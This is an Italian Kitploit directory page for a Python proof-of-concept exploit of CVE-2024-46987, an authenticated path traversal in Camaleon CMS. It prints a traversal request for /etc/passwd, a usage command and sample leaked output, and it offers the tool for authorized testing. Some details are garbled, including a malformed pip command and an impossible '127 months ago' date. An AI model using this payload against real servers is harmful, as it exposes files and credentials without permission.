Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-46987 — Exploit creato con Python | Kitploit
Strumenti/GitHubGitHub/advaitpathak21/cve-2024-46987
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Exploit creato con Python

Vedi Repository
127 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-46987 – Camaleon CMS Path Traversal Autenticato / Lettura Arbitraria di File

CVSS 7.7 High Python PoC

CVE-2024-46987 è una vulnerabilità di path traversal autenticato (CWE-22) in Camaleon CMS (un sistema di gestione dei contenuti basato su Ruby on Rails). Consente a un utente autenticato (anche con privilegi bassi) di leggere file arbitrari sul server tramite l'azione MediaController#download_private_file.

  • Pubblicato: 18 settembre 2024
  • CVSS v3.1: 7.7 Alto
    Vettore: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-22 (Limitazione impropria di un nome di percorso a una directory ristretta), CWE-200 (Esposizione di informazioni sensibili)
  • Versioni affette: Camaleon CMS ≤ 2.8.0 (alcuni report indicano che funziona anche su 2.9.0)
  • Patch disponibile in: ≥ 2.8.2 (consigliato: aggiornare all'ultima versione 2.8.x o 2.9.x)
  • Avvisi:
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
    • NVD CVE-2024-46987
    • GitHub Security Lab GHSL-2024-183

Panoramica della Vulnerabilità

Un attaccante con credenziali valide può inviare una richiesta appositamente costruita a: /admin/media/download_private_file?file=../../../../etc/passwd

Installazione dei Requisiti

  • pip install -r requirements.txt

OPPURE

  • pip install -r requests fire

Utilizzo

  • Prima crea un nuovo utente
python cms-exploit.py \
  --url http://target.local \
  --username neal \
  --password 'Caffery@123' \
  --cmd /etc/passwd
  • Output di esempio:
[+] Login riuscito
[*] Richiesta in corso: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Successo – contenuto:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.

Nota: Lo script presuppone un modulo di login in stile Rails (user[email], user[password], authenticity_token). Regola i campi del payload se il tuo target utilizza nomi personalizzati.

Avvertenza Legale ed Etica

Questo strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.

Utilizzalo solo su sistemi di tua proprietà o per i quali hai un esplicito permesso scritto di test (ad esempio, programmi bug bounty, pentest interni, laboratori come HTB). L'uso non autorizzato potrebbe violare leggi. L'autore non è responsabile per un uso improprio.

Scarica lo strumento